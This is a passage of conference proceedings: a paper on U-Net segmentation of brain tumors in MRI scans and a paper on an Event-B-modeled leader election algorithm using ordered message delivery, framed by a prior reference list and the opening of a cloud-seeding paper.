V. (2018). Detection of subtype blood cells using deep learning. Cognitive Systems Research
(Elsevier).
23. Zafar, K., Gilani, S. O., Waris, A., Ahmed, A., Jamil, M., Khan, M. N., & Sohail, K.
A. (2020). Skin lesion segmentation from dermoscopic images using convolutional neural
network. Sensors, 20(6).
24. Amin, J., Sharif, A., Gul, N., Anjum, M. A., Nisar, M. W., Azam, F., & Bukhari, S. A. (2020).
Integrated design of deep features fusion for localization and classification of skin cancer.
Pattern Recognition Letters, 131, 63–70.
25. Mahbod, A., Schaefer, G., Wang, C., Dorffner, G., Ecker, R., & Ellinger I. (2020). Transfer
learning using a multi-scale and multi-network ensemble for skin lesion classification.
Computer Methods and Programs in Biomedicine.
26. American Academy of Dermatology Association .(2021).‘Skin Cancer’. Retrieved from https://
www.aad.org/media/stats-skin-cancer.
Computerized Assisted Segmentation
of Brain Tumor Using Deep
Convolutional Network

Deepa Verma and Mahima Shanker Pandey

Abstract The cases related to brain tumors have risen dramatically in recent years,
which make an effect to all age group people and also the children. Brain tumor
treatment is challenging, especially in the determination of the spread of the tumor.
Magnetic resonance imaging (MRI) has been developed for diagnosing brain tumors
without ionizing radiation. It can be tedious and time-consuming to perform manual
segmentation of brain tumors from MRI scans, and the performance may vary if
the person diagnosing the scans changes. Therefore, a more efficient and reliable
method for segmentation of the brain tumor is necessary for measurement. This
paper discusses a segmentation algorithm for brain tumor with the help of U-Net
type deep convolutional networks.

Keywords Segmentation · Deep convolutional network · U-Net · Region growing

1 Introduction

Brain tumors are invasive and can be dreadful and cause cancer because of its
pitiful condition and consequence on motor functions of different parts of brain.
The magnetic resonance imaging (MRI) image taken as input image of brain tumors
used for diagnosis and treatment approach. MRI scans are used to measure brain
tumor vascularity, cellularity and blood–brain barrier (BBB) integrity. Variation in
size, shape, location, appearance, etc., of tumor serve as a challenge and the unsuper-
vised and supervised techniques that have been proposed in the past have been quite
successful but not so much as expected. Even a slight mistake can cause the patient
his/her life, so a more efficient method of brain tumor image segmentation is required.
Unsupervised learning methods like Fuzzy Clustering with Region Growing, etc.,
have proven to be successful in the past with accuracy reaching up to 77%. Supervised
learning methods like extremely randomized forest with super pixel-based segmen-
tation have also proven to be quite successful with accuracy reaching up to 88%. With

D. Verma · M. S. Pandey (B)


Department of Computer Science and Engineering Institute of Engineering and Technology,
Lucknow, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 461
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_37
462 D. Verma and M. S. Pandey

Fig. 1 T1, T1C, T2, FLAIR MRI Scans

increasing complexity of deep convolutional neural network and introduction of skip


architectures, the segmentation of brain images can be done more efficiently than
the supervised and unsupervised techniques applied earlier. Therefore, this paper
employs U-Net which consists of skip architecture to segment brain images.
A segmentation algorithm for brain tumor with the help of U- Net-based deep
convolutional networks presented in this paper by data set. The general view of brain
tumor identification in the introduction section. Section 2 focuses on a literature
review on current medical diagnosis research using U-Net type deep convolutional
networks. The fundamental and architecture of U-Net and deep residual network are
explained in the Sect. 3. Section 4 includes the methodology (algorithm and flow
chart) and used dataset. Section 5, give the results and performance of algorithm.
In Sect. 6, discussed the conclusion and future scope of the proposed segmentation
algorithm (Fig. 1).

2 Literature Review

MRI images studies of brain tumor is a critical step with manual image segmentation.
The manual image segmentation takes much time for segmenting the tumor, which
normally being slice-by-slice procedures, and the results are dependent on operators
knowledge. It is difficult to achieve the same result again through the same operator.
Moreover, HGG performing irregular boundaries that may also involve discon-
tinuation due to aggressive tumor intrusion. It may cause problems and may result in
poor tumor division [10]. Remove all problems of manual segmentation by automatic
segmentation of tumor.
Training data are required for supervised learning methods to learn a classifica-
tion model from new instances can be categorized and segmented. Both appearance
and context-based features were classified with 83% accuracy using an extremely
Computerized Assisted Segmentation … 463

randomized forest. Extremely randomized trees classification combined with Super


pixel (groups pixels similar in color and other low-level properties)-based segmen-
tation for MRI scans obtained 88% overall accuracy of both LGG and HGG tumors
cases have full tumors segmentation.
Data Augmentation [1] is the method of applying various techniques to create
more images by modifying the original data and keeping both the original and the
new data. The process of increasing the amount of data and diversity is called data
augmentation. Data augmentation was necessary for this project because the BraTS
dataset was small and convolutional neural networks need a fairly big dataset to
achieve promising results. Song et al. [11] proposes an adaptive brain tumor detec-
tion that use the support vector machine unsupervised manner. Devkota et al. [12]
addresses the brain tumor segmentation on MRI images with accuracy 89.5%. Zahra
et al. [13] uses artificial neural network algorithm and classify the types.
U-Net
U-Net paper by Olaf Ronneberger, Philipp Fischer, and Thomas Brox titled U-
Net: Convolutional Networks for Biomedical Image Segmentation [2] was referred
to understand and implement the U-Net architecture model.
Network Architecture
It consists of a contracting path (left side) and an expansive path (right side). The
contracting path follows the typical architecture of a convolutional network (Fig. 2).
Deep Residual Network (involving skip connections)
Each layer in conventional neural networks feeds into the next. Each layer feeds
into the next layer and directly into the layers 2–3 hops away in a network with

Fig. 2 U-Net architecture


464 D. Verma and M. S. Pandey

residual blocks. Neural networks are universal feature approximators, and the perfor-
mance of networks improves as the number of layers increases. However, there is
a limit on how many layers can be applied to increase accuracy. Sufficiently deep
networks may be unable to learn simple functions such as the identity function due
to issues such as vanishing gradients and the curse of dimensionality. Therefore, it
does not help adding more layers to the neural network and training them. Training
of a few layers can be skipped by adding skip connections / residual connections.
Skip connections were referred to from [3].
Skip Connection
Skip connections are shortcuts that convolutional neural networks employ to jump
over some layers to skip training of those layers.
Multi Res U Net
The classical U-Net lacks in certain aspects such as when shape and size of the
images vary and can produce poor results. To overcome this, MultiResUNet was
introduced. In MultiResUNet, Inception-like (from Google Inception-V3) blocks
were introduced which replaced some of the convolutional layers. This reconciled
the U-Net to learn features from images at different scale. The 5 × 5 and 7 × 7 convo-
lutional layers were factorized using 3 × 3 convolutional blocks. Then a residual
connection was added due to its efficacy in biomedical segmentation. MultiResUNet
was referred to from [4].
Synthetic Segmentation in 3D MRI Scans
To increase the contrast within subregions of brain tissue using a generative adver-
sarial network (GAN). It does this by generating synthetic images from FLAIR MRI
scan. This synthetic image along with FLAIR, T1ce and T2 scans are then input to a
3D fully connected network (FCN) to segment tumor regions. This was referred to
from [5].
Dense-Vnet
MRI scans and brain masks were trained in the convolutional neural network and
Dense-Vnet. Dense-Vnet is made up of three layers of dense feature stacks with
concatenated outputs (Fig. 3).

Fig. 3 Dense-Vnet Architecture


Computerized Assisted Segmentation … 465

3 Methodology

Here discuss the proposed approach and method which use in processing of image.
Image Segmentation
The image can be divided or partitioned into different sections, called segments.
It’s not a good idea to process the whole image at once because there would be areas
where no details are present. By splitting the image into segments, you can use the
important segments for image processing.
A set of pixels that are all different in an image. Image segmentation is a technique
for grouping pixels with similar characteristics.
Dataset
BraTS 2019 uses multi-institutional before operative MRI scans and focuses on
brain tumor segmentation, including gliomas, that works on intrinsically mixed (in
appearance, structure and histology). In addition, BraTS’19 also emphases on esti-
mating overall patient survival by unifying studies of radiomic features and machine
learning algorithms to identify the therapeutic significance of this segmentation
mission. It consists of 220 occurrences of HGG (high-grade glioma) cases and 54
instances of LGG (low-grade glioma) cases.
Network Architecture
A 9-layer U-Net was used to segment full tumor from the MRI scan. This was
done by giving Flair and T2 MRI scans as input to the 9-layer U-Net. The output was
the segmented image of the overall tumor. Middle point of this segmentation was
calculated and the image was cropped to segment core and ET part of tumor. The
cropped full tumor segmentation was given as input to a 7-layer U-Net. The output
will be core and ET part of tumor if sufficient pixels were present in the region
(Fig. 4).
Algorithm
1. Initially, one U-net model was used to segment full tumor, tumor core and
enhancing tumor (ET). It was found that full tumor got segmented but core
and ET were not properly segmented or not segmented at all. The problem was
because the core and ET of the tumor were too small compared to the whole
tumor, because core and ET consisted of less pixels than the whole tumor.
Therefore, model sometimes predicted that there is no tumor.
2. To solve the problem, firstly, full tumor was predicted by feeding the Flair and
T2 MRI scan images into a 9-layer U-Net. Full tumor prediction was cropped
to extract core and ET parts from T1ce MRI scan by calculating middle point
of full tumor prediction which consisted of most of the pixels.
3. The cropped parts were fed into another 7-layer U-Net which was used to predict
the core and ET of tumor. In post processing, coloring algorithm was applied
and core and ET predictions were pasted back to full tumor prediction after
applying different colors to core and ET.
4. Learning rate for training process of both the U-Nets was taken to be 1e-4 and
original image was 240 × 240 and extracted core and ET were 64 × 64.
466 D. Verma and M. S. Pandey

Fig. 4 Model used

5. Models were trained for 100 to 300 epochs until convergence occurred. Dice
Loss was used.
6. Dice Loss = 1-dice_coefficient.
7. Dice coefficient = (2*(true*pred) + smooth)/((true)
+(pred) + smooth)
Where smooth = factor used to smooth out boundary predictions so boundary is not crisp.

8. 9-layer U-Net architecture (4th and 6th blocks removed to form 7-layer U-Net)
(Fig. 5).
Flow Graph of proposed Model
BraTS dataset is used for the competition multimodal brain tumor segmentation
and detection each year. A test accuracy of around 90% is achieved.
We consider the result in terms of Recall, Precision and F1 Score (Figs. 6, 7, 8).

TP
Precision =
TP + FN

Here TP = True Positives FN = False Negatives

precision × recall
F1 × Score = 2
precision × recall
TP
Recall = × 100
TP + FN

Challenges
Computerized Assisted Segmentation … 467

Fig. 5 A Flow graph of the proposed model

• There can be many challenges that the app may face such as low-resolution MRI,
less amount of data in case of training on new data (transfer learning).
• Usually, resolution and tissue contrast of the acquired data going into segmentation
algorithms are too low for most algorithms to accurately identify many small
subregions.
• The boundaries of tumor may not be well defined in the MRI scan sometimes
which may lead to wrong segmentation.
468 D. Verma and M. S. Pandey

Original Data: -

flair t1ce t1 t2
Predictions: -

full tumor core ET final

Fig. 6 Result

Fig. 7 Result table FT Core ET

Precision 0.0 0.50 0.91

Recall 0.0 0.97 0.90

F_Score 0.0 0.65 0.90

Fig. 8 Loss plot


Computerized Assisted Segmentation … 469

4 Conclusion

This paper involves approach for detection of brain tumor and segmentation using the
U-Net CNN on both HGG and LGG cases, and it proves to be more efficient than the
previous unsupervised and supervised methods using normal machine learning tech-
niques. Data augmentation decreased the training time to a large extent which enabled
the training to be complete in 2–3 days. Test accuracy of about 90% was achieved.
This paper could be modified and used in the future to obtain the MRI image of brain
with tumor to find the size of tumor and to measure its tumor type and also the stage
of tumor. To achieve this 3D U-Net is used in place of conventional U-Net. MultiRes
U-Net can be used in the future instead of classical U-Net to get better results. In
this, certain convolutional layer of the U-Net are replaced with convolutional blocks
of the Google Inception-V3 convolutional neural network. Then, skip connections
used in residual network are used which will allow us to reuse the features from
previous layers plus the features obtained after convolution. Generative adversarial
network (GAN) be used to generate synthetic images of increased contrast which can
be used for segmentation to obtain better results. Dense-V net can be used to harness
the benefits of both Dense Net and U/V-Net. Dense Net contains skip connections
which can used to obtain both original features and features obtained after layers
for training. U/V-Net follows an encode–decode path. Combining both will produce
better result. A smaller CNN can be experimented and found with trial and error
which may give as good a result as Dense Net or U- Net.

References

1. Wang, J., Perez, L. (2017). The effectiveness of data augmentation in image classification us
ing deep learning, Stanford University.
2. Ronneberger, O., & Fischer, P. Thomas Brox: U-Net: convolutional networks for bio- medical
image segmentation, MICCAI.
3. He, K., Xiangyu Zhang, Shaoqing Ren, Jian Sun: Deep Residual Learning for Image
Recognition, Microsoft Research (2015)
4. Ibtehaz, N., Sohel Rahman, M. (2019). MultiResUNet : rethinking the U-Net architecture for
multimodal biomedical image segmentation. Neural Networks Journal.
5. Hamghalam, M., Lei, B., & Wang, T. (2020). Brain Tumor Synthetic Segmentation in 3D
Multimodal MRI Scans.
6. Ranjbar, S., Singleton, K. W., Curtin, L., Rickertsen, C. R., Paulson, L. E., Hu1, L. S., Mitchell,
J. R., & Swanson, K. R. (2020). Robust automatic whole brain extraction on magnetic resonance
imaging of brain tumor patients using dense-Vnet.
7. Liu, Z., Chen, L., Tong, L., Zhou, F., Jiang, Z., Zhang, Q., Shan, C., Zhang, X., Li, L., & Zhou,
H. (2020). Deep learning based brain tumor segmenta tion: a survey.
8. Sun, Y., Wang, C. (2020). A computation-efficient CNN system for high-quality brain tumor
segmentation.
9. Liu, D., Zhang, H., Zhao, M., Yu, X., Yao, S., & Zhou, W. (2018). Brain tumor segmention
based on dilated convolution refine networks. In 2018, IEEE 16th International Conference on
Software Engineering Research, Management and Applications (SERA).
10. Dong, H., Yang, G., Liu, F., & Mo’s, Y. (2017) Yike Guo’s: automatic brain tumor detection
and segmentation using U-Net based fully convolutional networks.
470 D. Verma and M. S. Pandey

11. Adhikary, S., Pimpalkar, A., & Kendhe, A. (2016). Detection of brain tumor from MRI images
by using segmentation and SVM. IEEE.
12. Sankari, D., Vigneshwari, S. (2017). automatic tumor segmentation using convolutionalneural
networks. In 2017 Third International Conference on Science Technology Engineering &
Management (ICONSTEM).
13. Borase, Z. V., Naik, G., & Londhe, V. (2018) Brain MR image segmentation for tumor detection
using artificial neural network. International Journal of Engineering and Computer Science
(IJECS).
Leader Election Algorithm in Fault
Tolerant Distributed System

Sudhani Verma, Divakar Yadav, and Girish Chandra

Abstract Reliability and availability are two important aspects of a fault-tolerant


distributed system. A replicated database system helps us to improve the availability
of a distributed system. In order to maintain the reliability, we need to maintain the
consistency among replicas. Consensus protocols are used to achieve coordination
among replicas, and leader plays pivotal role in these consensus algorithms. Leader
works as a powerful tool to gain consistency and to reduce the overhead in maintaining
the coherency among replicas. The leader election process requires consensus among
sites to elect one site as a leader of the system. In this article, we present the formal
development of leader-based election system in Event-B by proposing an algorithm,
leader election using ordered delivery (LEOD). This paper highlights the importance
of message ordering at delivery end in designing the algorithm for leader election in
distributed systems. We conclude this paper by giving specifications of algorithm in
Event-B using RODIN platform.

Keywords Formal methods · Leader election · Event-B · Message ordering

1 Introduction

A distributed system consists of several independent processing components commu-


nicating through messages via interconnecting communication link. Prime objective
is to provide a service by running algorithm that controls the processing of compo-
nents of a distributed system in order to attain a collective goal. The services are
provided in response to the client’s request. Although, the easiest way to implement
this architecture is centralized server architecture, but with increment in the number
of clients this approach did not scale well. Also, the service is as fault tolerant as the

S. Verma (B) · D. Yadav · G. Chandra


Institute of Engineering and Technology, AKTU, Lucknow 226021, UP, India
e-mail: 2307@ietlucknow.ac.in
D. Yadav
e-mail: dsyadav@ietluckknow.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 471
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_38
472 S. Verma et al.

centralized server running that service. In case of any fault, we must have a fault tol-
erant system which can keep the service available. A fault-tolerant system executes
the algorithms to control and make distributed system available for certain services
in the presence of failures. More a system can tolerate failure, higher is the resilience
to failures and more dependable the system becomes [1].
Fault tolerance in the system can be provided by replication. State machine repli-
cation is a famous approach for implementing fault-tolerant system [2]. In such
system, same data is replicated on different processors. These replicated processors
are referred as replicas, and algorithms are executed to coordinate client’s interaction
with these replicas. Replication of data objects improves system’s availability, but
keeping these replicas identical is a complex process. It is believed that designating
a single node as coordinator in a distributed system makes it easy to achieve the
coherency among replicas. The coordinator is also referred as leader or primary site
in the system. Leader election is highly efficient in improving the performance and
reducing the overhead of coordination among other servers. The consensus proto-
cols used in a fault tolerant distributed system implemented through replicated state
machine such as PAXOS [3], RAFT [4] have fundamentally worked on leader elec-
tion, where a leader is elected and the elected node instructs other nodes to achieve
consistency and coherency among replicas. Leader based consensus algorithms syn-
chronize replicated state machines to ensure that all replicas have the same view
of the system state. Electing leader in a distributed system is a difficult process
as coordination is required among processes to exchange information to reach an
agreement. Each process must agree on a specific node as the leader of a system.
Along with some classic algorithms for leader election like Bully and Ring algo-
rithm, several algorithms have been proposed for leader election [5–7]. We propose
a leader election algorithm in which timestamps and ordering of the messages are
taken into consideration. The paper is divided into five sections, Sect. 1 is introduc-
tion. In Sect. 2 we discuss the importance of message ordering, in Sect. 3 proposed
algorithm is presented. Later in Sect. 4, a formal model of the proposed algorithm is
given in event-B developed on RODIN platform and in Sect. 5 we state the conclusion
and future scope of the proposed algorithm.

2 Message Ordering

An important element of process execution in a distributed environment is the order of


delivery of messages, as it defines the messaging behavior that the distributed applica-
tion can anticipate. Ordered delivery of messages makes a system more fault-tolerant
against the fault that a system may have due to unordered delivery of messages [8,
9]. A global ordering of messages may be defined by employing logical clocks [10].
Ordering paradigms for messages are: Non-FIFO, FIFO, causal order, and total order.
The total order property limits the destination-based order of message delivery and
is not dependent on sender processes. The concept can be further constrained by two
sender-related properties, namely FIFO and causal order.
Leader Election Algorithm in Fault Tolerant … 473

2.1 Non-FIFO and FIFO Execution

When on any logical link between two nodes, message is being delivered in any order
not often in, first in-first out manner, the execution is known as non-FIFO, whereas
in FIFO execution messages are delivered in first in first out manner. Execution of
non-FIFO and FIFO are shown in Fig. 1a, b, respectively.

2.2 Causal Ordering

In causally ordered execution, suppose we have two send events S and S  that are
causally related (not ordered as per physical time), then their receive events R and R
at all common destinations must occur in the same order. Causal ordering is satisfied
when two events S and S  are concurrent (not causally related). In Fig. 2a an execution
that follows causal order is shown. In Fig. 2b causal order is violated by execution as
s1 ≺ s2 and r2 ≺ r1 at P1 (common receiver). In Fig. 2c, execution satisfies causal
order as they are not causally related.
In order to follow causal order in Fig. 2b message m2 must be kept waiting at P1
since s1 ≺ s2 then m1 must be delivered before m2 at P1.

Fig. 1 Non-FIFO and FIFO execution

Fig. 2 Causal ordered execution


474 S. Verma et al.

Fig. 3 Total ordered


execution for concurrent
processes

Fig. 4 Execution follow


total order broadcast, but
violates causal order

2.3 Total Order Broadcast

A total order broadcast may be referred as a stronger form of a reliable broadcast in


which all messages must be received in the same delivery order by all the recipients
of the messages. If two process Pi and Pj deliver messages Mx and My, then Pj
delivers Mx before My if and only if Pi delivers Mx beforeMy.
Total order broadcast in Fig. 3 is satisfied as m1 delivered before m2 at each
receiving end, the arrival of m2 (shown by dotted line) at r2 is not possible if total
order is followed for concurrent process. While in Fig. 4 total order is followed, but
causal order is not satisfied.

3 Leader Election Algorithm with Ordered Delivery


of Timestamped Messages

Leader election in a distributed system is an idea of assigning special duties to one


process. The duties may include handling all client requests, modifying some data in
other nodes, assigning some tasks to other nodes, etc. Elected Leader makes a system
fault tolerant by providing a single place to look for logs and metrics. We propose an
algorithm, leader-election using ordered-delivery (LEOD) for leader election, where
ordered delivery of messages is taken into consideration. The proposed algorithm
initiates its execution when there is no leader in the system. It gives equal opportunity
to all the sites to initiate the election process. Any site can begin the process by
Leader Election Algorithm in Fault Tolerant … 475

broadcasting a timestamped request message. For ordering of messages at receiving


end, we consider causal ordering for causally related events. If events are not causally
related, messages will be broadcasted using total order broadcast. Vector logical clock
is used to assign timestamps to the messages. We assume all the communication
channels are FIFO channels, and the communication is reliable. We also assume
that all processes are correct, i.e., they never experience crash failure and byzantine
failure.
Informal steps of the algorithm:
1. Site that wants to be the leader of the system, broadcasts a timestamped request
message to all the other sites,
2. The receiving site sends a timestamped reply message as the acknowledgment
and acceptance to the requesting site.
3. On arrival of each reply message the requesting site counts the number of received
responses.
4. Requesting site declares itself as the leader of the system if following conditions
hold:
(a) All the received responses have timestamp greater than the timestamp of the
request message.
(b) Majority of the sites responded, i.e., number of responded sites ≥ (M/2+1)
where M is the total number of participating sites in the system.
5. Elected site performs the task.
6. After completing the task elected leader broadcasts a relinquish message to with-
draw the authority as a leader.
7. On arrival of relinquish message, a site proceeds in following manner:
(a) If there is no request message from any other site waiting at its end, it can
initiate the election process again
(b) else it responds to the request message waiting at its end in increasing order
of timestamp.
Conditions mentioned in point number 4 above, ensures the oldest request message
in the system gets the priority in leader election and only one site is elected as a leader
at a particular time. On receiving relinquish message, a site will get to know that
there is no leader in the system, hence participating sites may respond to a received
request as per the timestamp of the received request or may initiate new process if
there is no request in waiting, as mentioned above in point number 7.
We have four types of messages in the proposed algorithm:
Request message: It is the request message that is broadcasted to all other sites
according to the ordering mechanism used in the algorithm. Same request message
must be delivered to the sender of request message.
Acknowledgment and Acceptance Message: The accept message sent as a
response to the request message, this message sends an acknowledgement and accep-
tance to the sender for becoming the leader.
476 S. Verma et al.

Fig. 5 Process execution of the proposed algorithm with total and causal ordered delivery of
messages

Fig. 6 Process execution of the proposed algorithm with total and causal ordered delivery of
messages

Elect Message: When the requested site (sender of request message) receives the
majority of responses, it broadcasts a leader-elect message to declare itself as the
leader.
Relinquish Message: When the elected leader completes the task, it broadcasts a
relinquish message to let other sites know that it has completed the task and they can
initiate the leader election process.
Execution of the proposed algorithm with causal ordering and total ordering is
shown in Figs. 5 and in 6. We have considered three processes P1, P2 and P3 running
on different sites in the system. Let P1 initiate the process by broadcasting a request
message m1, on receiving a request other sites will acknowledge the request and
send an accept message m2, event e21 and e31 are causally preceded by event e11.
If any other site, which already accepted a request message, wants to initiate the
election process, as in Fig. 5 P3 initiates the process by sending request message m3,
it is permissible and the request should be accepted by the other sites. As events e31
and e32 are causally related, accept message m2 must be delivered before request
message m3 at common destination, i.e., P1 according to causal ordering. In Fig. 5
event e14 showing delivery of m2 message (by dotted line) after delivery of m3
message is not acceptable. The request message m3 must wait until the previous
request is fully processed by the requesting site.
Leader Election Algorithm in Fault Tolerant … 477

Fig. 7 Concurrent processes


with total ordered execution
of proposed algorithm

The next part of execution is shown in Fig. 6. Whenever the requesting site receives
the majority of the votes (i.e., M/2+1 where M is the number of site) it will broadcast
a message m4 claiming itself as the leader of the system (event e16 in Fig. 6). P1
will act as the leader of the system until it sends a relinquish message m5 to all
the sites through event e17. The message m5 will notify to the other sites that the
previous leader has completed its task and currently there is no designated leader
in the system. Now the site will acknowledge the request messages from other sites
(i.e., message m2) and sends an accept message m6 (event e18 and e24). The events
e16,e17,e18, and e24 are causally related to each other.
If two process sends request message concurrently (at the same logical time), i.e.,
they are not causally related then ordering of the events are ensured by total order
broadcast. In Fig. 7, both send events of process P1 and P3 are concurrent and follow
total ordering at the time of delivery, hence event e13 ‘(shown by dotted line) is not
acceptable at process P1. In this scenario, P3 will be elected as a leader as discussed
in the algorithm since its request is received first by processes P1, P2, and P3 through
events e12, e21 and e32, respectively.
After a leader election process has been executed, each node should recognize
a particular node as the task leader. The nodes communicate among themselves in
order to decide which one of them will get into the leader state. Each node has equal
opportunity of electing itself as the leader. The leader election problem can be seen
as a problem for each node to decide whether it is a leader or not. Constraint of the
algorithm is that exactly one node must decide that it is the leader. In algorithm, the
liveness property states that each processor must be in one state either elected or not
elected as a leader, safety property state that in every execution exactly one node
becomes a leader and rest determines that they are not elected. Basic properties of
an algorithm are achieved in the proposed algorithm in the following manner:
Termination: The algorithm completes the execution in finite time and one node
is elected as a leader.
Uniqueness: Exactly one node claims itself as the leader of a system at a particular
time.
Agreement: All other nodes should know about the elected leader and agree on
the election outcome.
478 S. Verma et al.

4 Modeling Approach

Event-B [11, 12] is a formal technique that precisely describes the possible behavior
of the system mathematically in an unambiguous manner. The problem is described
in an abstract model, followed by refinement levels introducing more detailed spec-
ifications. It has two components Machine and Context; Machine is the dynamic
part of the model, while context is the static part of the model. Machine provides
the behavioral properties of the model. It contains the variables, invariants, theo-
rem, and events. The events have guards and actions and at each refinement level
these guards are strengthened. The variable must satisfy invariants and the invariants
should be maintained by the activation of events. RODIN [13] is an industrial level
B tool that provides an automated proof support. It generates the proof obligations
and discharges them. Event-B has been extensively used in formal verification of
behavioral properties of a distributed system. The Event B specifications of global
causal ordering for fault tolerant transactions and total order broadcast for distributed
transactions on RODIN platform has been presented in [14, 15] respectively. In [16],
a formal approach of modeling and verification of distributed transactions for repli-
cated databases has been presented. In designing of a distributed system, liveness
and safety are two important issues to deal with. With respect to safety, RODIN gen-
erates proof obligations. In order to ensure that models are live and make progress,
in [17] it has been proved that Event-B models are non-divergent and enabledness
preserving. Security-critical system are modeled using Event-B, in [18] incremental
development of Mondex electronic purse (used for financial transactions) system in
Event-B is presented.

4.1 Event-B Model of Leader Election Algorithm:


Specification Using Refinement Levels

(i) Abstract Level: In the abstract level machine, we model the basic abstract objec-
tive of the algorithm. In the proposed algorithm for leader election (LEOD), we
assume that there is a set of sites among which a leader has to be chosen. In the
context, we define a finite carrier set SITE. In machine, we declare a variable leader
that belongs to power set of SITE and elected randomly by the execution of the event
ElectLeader. The event will execute only if there is no prior leader in the system.
Leader Election Algorithm in Fault Tolerant … 479

MACHINE LeaderM
SEES LeaderC
VARIABLES s,leader
INVARIANTS : s ∈ SITE, leader ∈ P(SITE)
EVENTS INITIALIZATION THEN
leader := ∅,s : ∈ SITE
END
ElectLeader
WHEN leader=∅
THEN leader:={s}
END
END

(ii) First Refinement Level: In first refinement level, new variables and events will
be introduced. Following are the proposed events in the first refinement level:
(a) Request_Vote: Whenever any site wants to become leader in the system, it broad-
cast a timestamped request message by executing this event .
(b) Receive_RequestVote: The event marks the delivery of the request message at
other sites.
(c) Response_Request: Through this event, a site sends its response to the requesting
site.
(d) Response_Receive: This event signifies that the response of a particular site is
being delivered at requesting site.
(e) ElectLeader: This is an event of abstract level that is being refined in this refine-
ment level, when requesting site receives majority of responses, it declares itself
as the leader and broadcast a message notifying the same.
(f) Leader_Release: After the elected leader completes its task it broadcast a relin-
quish message through this event.
(g) Receive_LeaderRelease: Delivery of relinquish message at other sites is marked
by this event.

5 Conclusion and Future Scope

Through replication of data objects at different sites, availability of the system is


enhanced. However, it introduces new challenges to keep these replicas similar.
Leader-based consensus protocols such as RAFT, PAXOS and its variants are used
to achieve this objective. Leader election ease the work of maintaining the consis-
tency among replicas. In this paper, we have outlined an algorithm for leader election
and demonstrate its incremental development in event-B using RODIN platform. In
future, we intend to develop specifications of next refinement level that captures finer
behavior of this system giving more insight and demonstrate the techniques of incre-
mental development in Event-B for achieving the correct and detailed specification
of the system.
480 S. Verma et al.

References

1. Kshemkalyani, S. (2005). Distributed computing book. Cambridge Company.


2. Schneider, F. B. (1990). Implementing fault-tolerant services using the state machine approach:
A tutorial. ACM Computing Surveys, 22(4), 299–319.
3. Lamport, L. (2001). Paxos Made Simple, ACM SIGACT News (Distributed Computing Col-
umn) 32, 4 (Whole Number 121, December 2001) pp. 51–58.
4. Ongaro, D., & Ousterhout, J. (2014). In search of an understandable consensus algorithm. In
Proceedings of the 2014 USENIX Conference on USENIX Annual Technical Conference (USA,
2014), USENIX ATC–14, USENIX Association, pp. 305–320.
5. Kordafshari, M. S., Gholipour, M., Jahanshasi, M., & Haghighat, A. T. (2005). Modified bully
election algorithm in distributed system. Wseas Conferences, Cancun, Mexico, May 11-14
2005.
6. Cahng, H.-C., & Lo, C.-C. (2012). A consensus based leader election algorithm for wireless Ad
Hoc Networks. In International Symposium on Computer, Consumer and Control, Taichung,
Taiwan, June 4-6 2012.
7. Khanna, A., Kumar Singh, A., & Swaroop, A. (2014). A Leader-based k-local mutual exclusion
algorithm using token for MANETs. Journal of Information Science and Engineering, 30(5),
1303–1319.
8. Défago, X., Schiper, A., & Urbán, P. (2004). Total order broadcast and multicast algorithms:
taxonomy and survey. ACM Computing Surveys, 36(4), 372–421.
9. Singh, G. & Badarpura, S. (2001). Application ordering in group communication. In Proceed-
ings 21st International Conference on Distributed Computing Systems Workshops (pp. 11–16)
Mesa, AZ, USA. https://doi.org/10.1109/CDCS.2001.918680.
10. Lamport, L. (1978). Time, clocks and ordering of events in distributed systems. Communica-
tions of the ACM.
11. Abrial, J. R. (2010). Modeling in event-B: System and software engineering. Cambridge Uni-
versity Press. ISBN 978-0-521-89556-9.
12. Metayer, C., Abrial, J. R., Voison, L. (2005). Event-B language. RODIN deliverables 3.2. http://
rodin.cs.ncl.ac.uk/deliverables/D7.pdf.
13. Abrial, J. R. (2007). A system development process with Event-B and the Rodin platform. In:
Lecture Notes In Computer Science (Vol. 4789, pp. 1–3). Springer.
14. Yadav, D., & Butler, M. (2005). Application of event B to global causal ordering for fault
tolerant Transactions. In Proceeding of REFT 2005, Newcastle upon Tyne, pp. 93–103 (2005)
15. Yadav, D., & Butler, M.: Formal development of a total order broadcast for distributed transac-
tions using event-B. In Lecture Notes in Computer Science (Vol. 5454, pp. 152–176). Springer-
Verlag Berlin Heidelberg.
16. Yadav, D., & Butler, M. (2006). Rigorous design of fault-tolerant transactions for replicated
database systems using event B. In: M. Butler, C.B. Jones, A. Romanovsky, E. Troubitsyna
(Eds.), Rigorous Development of Complex Fault-Tolerant Systems. Lecture Notes in Computer
Science (Vol. 4157). Berlin, Heidelberg: Springer.
17. Yadav, D., & Butler, M. (2009). Verification of liveness properties in distributed systems. In:
Ranka, S. (Eds.), Contemporary Computing. IC3, et al. (2009). Communications in Computer
and Information Science (Vol. 40). Berlin, Heidelberg: Springer.
18. Butler, M., & Yadav, D. (2008). An incremental development of the mondex system in Event-B.
Formal Aspects of Computing, 20(1), 61–77.
Engine Prototype and Testing
Measurements of Autonomous
Rocket-Based 360 Degrees Cloud Seeding
Mechanism

Satyabrat Shukla, Gautam Singh, and Purnima Lala Mehta

Abstract Water being a necessity in various forms is always on demand for creating
power, drinking, cultivation, and farming, etc. hence, being a crucial asset for
humanity. A lot of regions are still scarce in water and get an irregular supply. As the
population is increasing, the need for water will increase drastically for usage and
other necessary purposes. One of the major problems that arise due to scarcity of water
is in agriculture, where lack of water affects crop yields and survivability. To solve
these problems, we propose and implement a novel technique of rocket-based 360
degrees cloud seeding to enhance artificial rain using an autonomous-landing rocket
and various machine learning concepts covering reinforcement learning, supervised
and unsupervised learning. In this paper, we have tested and analyzed the first phase
of the proposed technique that provided certain results over the design and application
of the first phase.

Keywords Artificial rain · Cloud seeding · Reinforcement learning · Autonomous


self-landing · Hybrid rocket · 360° degrees · Umbrella mechanism

1 Introduction

Water is the most important support system to sustain life on Earth. Various sources
of water like rivers, groundwater, and reservoirs, or other means are on verge of
getting depleted due to the ever-increasing demands of the rising population. To
meet these demands, many countries try making artificial rain to increase the prob-
ability of rain. Though there are multiple impacts of the rain enhancement method,

